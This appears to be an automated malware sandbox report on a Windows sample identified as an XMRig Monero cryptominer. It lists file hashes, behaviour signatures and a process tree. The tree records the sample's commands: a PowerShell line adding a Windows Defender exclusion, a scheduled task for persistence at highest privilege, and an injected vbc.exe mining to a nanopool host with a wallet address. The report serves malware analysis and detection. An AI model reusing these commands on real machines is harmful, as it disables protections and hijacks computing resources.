Analysis
-
max time kernel
169s -
max time network
183s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
24-11-2022 00:30
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
1.4MB
-
MD5
df86d605b3aa3dd86b70cfc103622143
-
SHA1
d300bf3bd1abbf0e87a3c5c0a565e472a00b83e3
-
SHA256
f108dd568dcb4f08c5986c31eaac74e41cb59bc69db87d17a1033016308beed5
-
SHA512
695209126e7a814286375a257b8585dd0bcc097d3a2a895ab1ece2c7d3700bbc6c5d5a0679dec5094a7453ad1ee3fd7a0285cb5adbf874d6afeab121b6f3ae60
-
SSDEEP
24576:Mf8GBTvwpet3j9gkEubdiHn/cVo8qBWkaQFX2l:Mf8GBTopeN9PwES8izFGl
Malware Config
Signatures
-
XMRig Miner payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/4800-188-0x0000000140343234-mapping.dmp xmrig behavioral2/memory/4800-187-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4800-189-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4800-190-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4800-192-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
OWT.exepid process 4128 OWT.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
OWT.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation OWT.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
OWT.exedescription pid process target process PID 4128 set thread context of 4800 4128 OWT.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4864 timeout.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
file.exepowershell.exeOWT.exepowershell.exepid process 4036 file.exe 4036 file.exe 5024 powershell.exe 5024 powershell.exe 4128 OWT.exe 4128 OWT.exe 2848 powershell.exe 2848 powershell.exe 4128 OWT.exe 4128 OWT.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 664 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
file.exepowershell.exeOWT.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 4036 file.exe Token: SeDebugPrivilege 5024 powershell.exe Token: SeDebugPrivilege 4128 OWT.exe Token: SeDebugPrivilege 2848 powershell.exe Token: SeLockMemoryPrivilege 4800 vbc.exe Token: SeLockMemoryPrivilege 4800 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 4800 vbc.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
file.execmd.exeOWT.execmd.exedescription pid process target process PID 4036 wrote to memory of 5024 4036 file.exe powershell.exe PID 4036 wrote to memory of 5024 4036 file.exe powershell.exe PID 4036 wrote to memory of 4568 4036 file.exe cmd.exe PID 4036 wrote to memory of 4568 4036 file.exe cmd.exe PID 4568 wrote to memory of 4864 4568 cmd.exe timeout.exe PID 4568 wrote to memory of 4864 4568 cmd.exe timeout.exe PID 4568 wrote to memory of 4128 4568 cmd.exe OWT.exe PID 4568 wrote to memory of 4128 4568 cmd.exe OWT.exe PID 4128 wrote to memory of 2848 4128 OWT.exe powershell.exe PID 4128 wrote to memory of 2848 4128 OWT.exe powershell.exe PID 4128 wrote to memory of 2480 4128 OWT.exe cmd.exe PID 4128 wrote to memory of 2480 4128 OWT.exe cmd.exe PID 2480 wrote to memory of 4740 2480 cmd.exe schtasks.exe PID 2480 wrote to memory of 4740 2480 cmd.exe schtasks.exe PID 4128 wrote to memory of 4800 4128 OWT.exe vbc.exe PID 4128 wrote to memory of 4800 4128 OWT.exe vbc.exe PID 4128 wrote to memory of 4800 4128 OWT.exe vbc.exe PID 4128 wrote to memory of 4800 4128 OWT.exe vbc.exe PID 4128 wrote to memory of 4800 4128 OWT.exe vbc.exe PID 4128 wrote to memory of 4800 4128 OWT.exe vbc.exe PID 4128 wrote to memory of 4800 4128 OWT.exe vbc.exe PID 4128 wrote to memory of 4800 4128 OWT.exe vbc.exe PID 4128 wrote to memory of 4800 4128 OWT.exe vbc.exe PID 4128 wrote to memory of 4800 4128 OWT.exe vbc.exe PID 4128 wrote to memory of 4800 4128 OWT.exe vbc.exe PID 4128 wrote to memory of 4800 4128 OWT.exe vbc.exe PID 4128 wrote to memory of 4800 4128 OWT.exe vbc.exe PID 4128 wrote to memory of 4800 4128 OWT.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5024 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp16F3.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:4864 -
C:\ProgramData\winrar\OWT.exe"C:\ProgramData\winrar\OWT.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"5⤵
- Creates scheduled task(s)
PID:4740 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4800
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5df86d605b3aa3dd86b70cfc103622143
SHA1d300bf3bd1abbf0e87a3c5c0a565e472a00b83e3
SHA256f108dd568dcb4f08c5986c31eaac74e41cb59bc69db87d17a1033016308beed5
SHA512695209126e7a814286375a257b8585dd0bcc097d3a2a895ab1ece2c7d3700bbc6c5d5a0679dec5094a7453ad1ee3fd7a0285cb5adbf874d6afeab121b6f3ae60
-
Filesize
1.4MB
MD5df86d605b3aa3dd86b70cfc103622143
SHA1d300bf3bd1abbf0e87a3c5c0a565e472a00b83e3
SHA256f108dd568dcb4f08c5986c31eaac74e41cb59bc69db87d17a1033016308beed5
SHA512695209126e7a814286375a257b8585dd0bcc097d3a2a895ab1ece2c7d3700bbc6c5d5a0679dec5094a7453ad1ee3fd7a0285cb5adbf874d6afeab121b6f3ae60
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
Filesize
138B
MD5aa00f8f8c57784dcc675b7298b0740fd
SHA1174706d5bc608dcf62275d3980be349fdead00f7
SHA256969bb1450321ed93a0a538db1a46283ff97c612d9324357448c06c3799776a7a
SHA51206d2f8660e7a48adcd060b30b4e2bdaad8b9d514edb18d45e350ecfab88bb5e3eb5ebfb29df70d11b9d8d059f4707c935197d7dc65336f1cb43ba79cb097d59b